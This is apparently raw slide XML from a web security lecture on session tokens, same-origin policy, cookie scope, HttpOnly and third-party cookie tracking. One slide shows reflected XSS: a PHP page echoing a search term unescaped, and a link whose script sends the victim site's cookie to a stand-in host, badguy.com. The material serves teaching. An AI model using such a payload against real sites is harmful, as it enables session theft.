              <a:rPr lang="en-US" b="1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k: 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key known to all web servers in site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="32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Server must still maintain some user state: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e.g.    logout status      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(should be checked on every request)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32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Note that nothing binds SID to client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machine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ounded Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="3886200"/>
            <a:ext cx="73152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ounded Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="1905000"/>
            <a:ext cx="73152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Same origin policy:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="360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high level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="360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717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371600"/>
            <a:ext cx="8001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Review:   Same Origin Policy (SOP) for DOM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="520700" lvl="1" indent="-233363">
              <a:lnSpc>
                <a:spcPts val="3400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="12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Origin A can access origin B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DOM if match on</a:t>
            </a:r>
            <a:b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altLang="ja-JP" sz="2600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(scheme,   domain,  port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="520700" lvl="1" indent="-233363"/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Today:  Same Original Policy (SOP) for cookies: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="520700" lvl="1" indent="-233363">
              <a:lnSpc>
                <a:spcPts val="3400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef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Generally speaking, based on:</a:t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  <a:r>
              <a:rPr lang="en-US" sz="2600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([scheme],  domain,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"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</a:p>
          <a:p>
            <a:pPr marL="520700" lvl="1" indent="-233363"/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4648200"/>
            <a:ext cx="1071559" cy="901893"/>
            <a:chOff x="2209800" y="4984376"/>
            <a:chExt cx="1071282" cy="902327"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7176" name="TextBox 4"/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1022773" cy="400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optional</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7177" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2761129" y="4984376"/>
              <a:ext cx="519953" cy="573742"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 519953"/>
                <a:gd name="T1" fmla="*/ 573742 h 573742"/>
                <a:gd name="T2" fmla="*/ 394447 w 519953"/>
                <a:gd name="T3" fmla="*/ 340659 h 573742"/>
                <a:gd name="T4" fmla="*/ 519953 w 519953"/>
                <a:gd name="T5" fmla="*/ 0 h 573742"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 519953"/>
                <a:gd name="T10" fmla="*/ 0 h 573742"/>
                <a:gd name="T11" fmla="*/ 519953 w 519953"/>
                <a:gd name="T12" fmla="*/ 573742 h 573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953" h="573742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3581400" y="5943600"/>
            <a:ext cx="5410200" cy="6096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scheme://domain:port/path?params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Binding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SessionToken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to client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3200" b="1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sz="3200" b="1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" dirty="0" smtClean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computer; mitigating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1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cookie theft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19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6482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Client IP Address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Will make it harder to use token at another machine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But honest client may change IP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addr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during session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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client will be logged out for no reason.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Client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user agent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A weak defense against theft, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>doesn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t hurt.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SSL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session key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Same problem as IP address   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(and even worse)</a:t>
            </a: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533400" y="1295400"/>
            <a:ext cx="6083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pproach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embed machine specific data in SID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Cookies Theft:</a:t>
            </a:r>
            <a:b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Cross Site Scripting (XSS)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reflected XSS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7"/>
            <a:ext cx="83058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field on victim.com:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pP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http://victim.com/search.php ? term = apple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="600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6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Server-side implementation of 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search.php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spcBef>
                <a:spcPts val="180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&lt;HTML&gt;    &lt;TITLE&gt; Search Results &lt;/TITLE&gt;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Results for &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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echo $_GET[term] ?&gt; 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. .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&lt;/BODY&gt;   &lt;/HTML&gt;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22897" y="4249737"/>
            <a:ext cx="4592103" cy="1904213"/>
            <a:chOff x="3048000" y="4267272"/>
            <a:chExt cx="4592103" cy="1903611"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23557" name="Rounded Rectangle 3"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3048000" y="4267272"/>
              <a:ext cx="4419600" cy="60960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58" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5257800" y="4894136"/>
              <a:ext cx="1387366" cy="614854"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T1" fmla="*/ 614855 h 614855"/>
                <a:gd name="T2" fmla="*/ 504497 w 1387366"/>
                <a:gd name="T3" fmla="*/ 409904 h 614855"/>
                <a:gd name="T4" fmla="*/ 0 w 1387366"/>
                <a:gd name="T5" fmla="*/ 0 h 614855"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1387366"/>
                <a:gd name="T10" fmla="*/ 0 h 614855"/>
                <a:gd name="T11" fmla="*/ 1387366 w 1387366"/>
                <a:gd name="T12" fmla="*/ 614855 h 6148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7366" h="614855">
                  <a:moveTo>
                    <a:pt x="1387366" y="614855"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1061545" y="563617"/>
                    <a:pt x="735725" y="512380"/>
                    <a:pt x="504497" y="409904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273269" y="307428"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="0"/>
                  </a:cubicBez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59" name="TextBox 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5833198" y="5524756"/>
              <a:ext cx="1806905" cy="646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echo search term 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into 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Bad input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" y="1143000"/>
            <a:ext cx="25908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05800" cy="5638800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link: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(properly URL encoded)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http://victim.com/search.php ? term =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	&lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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window.open</a:t>
            </a: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		“http://badguy.com?cookie = ” +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)  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcBef>
                <a:spcPct val="70000"/>
              </a:spcBef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What if user clicks on this link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914400" lvl="1" indent="-457200"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Browser goes to    victim.com/search.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"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Victim.com returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-457200">
              <a:buSzTx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&lt;HTML&gt; Results for &lt;script&gt; … &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200"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Browser executes script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2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Sends badguy.com   cookie  for victim.com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16F69D0-22AE-4AA3-8532-064E76096DCA}" type="slidenum">
              <a:rPr lang="en-GB">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>44</a:t>
            </a:fld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what?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45720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would user click on such a link?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Phishing email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Link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doubleclick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banner ad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 many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ways to fool user into clicking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other forms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of XSS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do not require clicking on links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Tx/>
              <a:buFont typeface="Symbol" pitchFamily="18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8382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HttpOnly Cookies   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IE6 SP1,   FF2.0.0.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345541" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="13874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5542" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1547813" y="14874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solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345543" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="22256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5544" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="24542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5545" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2190750" y="22209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5546" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="13112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>
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345547" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="17684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5548" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3705225" y="1295400"/>
            <a:ext cx="1203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solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345549" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="19970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45550" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="2057400"/>
            <a:ext cx="48006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808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="808000"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1345565" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3352800"/>
            <a:ext cx="7589578" cy="274126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Cookie sent over HTTP(s),  but not accessible to scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="4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cannot be read via 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document.cookie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ct val="4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Also blocks access from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headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="4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Helps prevent cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2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…  but does not stop most other risks of XSS bugs.</a:t>
            </a:r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7443788" y="914400"/>
            <a:ext cx="1471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(not Safari)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u="sng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Party Cookies: User Tracking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party cookies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562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they are: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goes to site   A. com    ;    obtains page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contains   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=“B.com”&gt;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Browser goes to   B.com   ;    obtains page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HTTP response contains cookie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Cookie from B.com is called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party cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef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   User goes to site   D.com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D.com contains   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=“B.com”&gt;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B.com  obtains cookie set when visited  A.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-455613">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone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B.com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knows user visited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A.com  and  D.com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00" name="Straight Connector 4"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3810000"/>
            <a:ext cx="83058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we block 3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party cookies?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486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IE and Safari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	block set/write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Ignore the “Set-Cookie” HTTP header from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parties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="110000"/>
              <a:buFont typeface="Symbol" pitchFamily="18" charset="2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Site sets cookie as a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party;   will be given 	cookie when contacted as a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party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Enabled by default in IE7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Firefox and Opera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	block send/read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implement “Set-Cookie” ,  but never send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cookies to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Breaks sess. mgmt. at several sites   (off by default)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Effectiveness of 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30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party blocking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4196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Ineffective for improving privacy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party can become first party and then set cookie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Flash cookies not controlled by browser cookie policy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IE8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InPrivate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browsing and Chrome incognito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Upon exit,  delete all browser state collected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in private browsing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114800" y="2641600"/>
            <a:ext cx="4314246" cy="685800"/>
            <a:chOff x="4495800" y="3124200"/>
            <a:chExt cx="4314457" cy="68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495800" y="3124200"/>
              <a:ext cx="3505371" cy="68580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09" name="TextBox 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8042060" y="3152745"/>
              <a:ext cx="7681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scope</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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Setting/deleting cookies by server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81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4495800"/>
            <a:ext cx="8763000" cy="1270000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Delete cookie by setting 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expires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 to date in past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Default scope is domain and path of setting URL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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447800" y="12096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547813" y="13096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 dirty="0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066800" y="20478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066800" y="22764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190750" y="20431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6781800" y="11334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3806494" y="1117600"/>
            <a:ext cx="1000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GET …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2819400" y="1879600"/>
            <a:ext cx="56388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HTTP Header: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   Set-cookie:	NAME=VALUE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	domain = (when to send)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	path = (when to send)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	secure = (only send over SSL);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	expires = (when expires)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	HttpOnly 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914400" y="2870200"/>
            <a:ext cx="1859805" cy="64633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expires=NULL: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session only</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8206" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1498600"/>
            <a:ext cx="419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7" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2590800" y="1878013"/>
            <a:ext cx="419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Scope setting rules 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(write SOP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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257800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</a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>domain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 any domain-suffix of URL-hostname, except TLD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example:     host = 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b="1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login.site.com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endParaRPr lang="en-US" altLang="ja-JP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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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  <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t> 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login.site.com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 can set cookies for all of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1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site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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but not for another site  or  TLD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en-US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Problematic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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for sites like   .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean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stanford.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean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and some hosting center</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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  <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A4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buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>path</a:t>
            </a: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:  can be set to anything</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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676400" y="2531983"/>
            <a:ext cx="227658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allowed domains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2D44A4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>login.site.com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2D44A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solidFill>
                  <a:srgbClr val="2D44A4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A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23527" y="2438400"/>
            <a:ext cx="2635658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disallowed domains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2D44A4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>user.site.com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2D44A4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>othersite.com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2D44A4"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2D44A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Cookies are identified by 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name,domain,path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)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4876800"/>
            <a:ext cx="7772400" cy="1066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Both cookies stored in browser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’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 cookie jar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="80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		both are in scope of    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2D44A4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login.site.com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3227165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cookie 1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login.site.com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9037" y="1371600"/>
            <a:ext cx="2577950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cookie 2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test123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site.com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3873500" y="4035425"/>
            <a:ext cx="2105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distinct cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10247" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2759075" y="3746500"/>
            <a:ext cx="1228725" cy="581025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1214045 w 1229710"/>
              <a:gd name="T1" fmla="*/ 556817 h 580696"/>
              <a:gd name="T2" fmla="*/ 357987 w 1229710"/>
              <a:gd name="T3" fmla="*/ 493179 h 580696"/>
              <a:gd name="T4" fmla="*/ 0 w 1229710"/>
              <a:gd name="T5" fmla="*/ 0 h 580696"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1229710"/>
              <a:gd name="T10" fmla="*/ 0 h 580696"/>
              <a:gd name="T11" fmla="*/ 1229710 w 1229710"/>
              <a:gd name="T12" fmla="*/ 580696 h 580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9710" h="580696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8" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6022975" y="3746500"/>
            <a:ext cx="835025" cy="536575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 835572"/>
              <a:gd name="T1" fmla="*/ 544847 h 536028"/>
              <a:gd name="T2" fmla="*/ 686452 w 835572"/>
              <a:gd name="T3" fmla="*/ 416647 h 536028"/>
              <a:gd name="T4" fmla="*/ 826863 w 835572"/>
              <a:gd name="T5" fmla="*/ 0 h 536028"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 835572"/>
              <a:gd name="T10" fmla="*/ 0 h 536028"/>
              <a:gd name="T11" fmla="*/ 835572 w 835572"/>
              <a:gd name="T12" fmla="*/ 536028 h 536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572" h="536028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3962400" cy="4572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Reading cookies on server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MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(read SOP)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3048000"/>
            <a:ext cx="8458200" cy="2590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Browser sends all cookies in URL scope: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cookie-domain is domain-suffix of URL-domain, and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cookie-path is prefix of URL-path, and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[protocol=HTTPS  if cookie is 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“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secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>]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Goal:   server only sees cookies in its scope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800" y="1295400"/>
            <a:ext cx="1524000" cy="1219200"/>
            <a:chOff x="1066800" y="1828800"/>
            <a:chExt cx="1524000" cy="1219200"/>
          </a:xfrm>
        </p:grpSpPr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 dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="808000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Browser</a:t>
              </a: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781800" y="1219200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895600" y="1600200"/>
            <a:ext cx="31043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GET  //URL-domain/URL-path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Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11271" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="1522413"/>
            <a:ext cx="419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Examples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4572000"/>
            <a:ext cx="3810000" cy="16764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charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800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http://checkout.site.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800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http://login.site.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4114800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
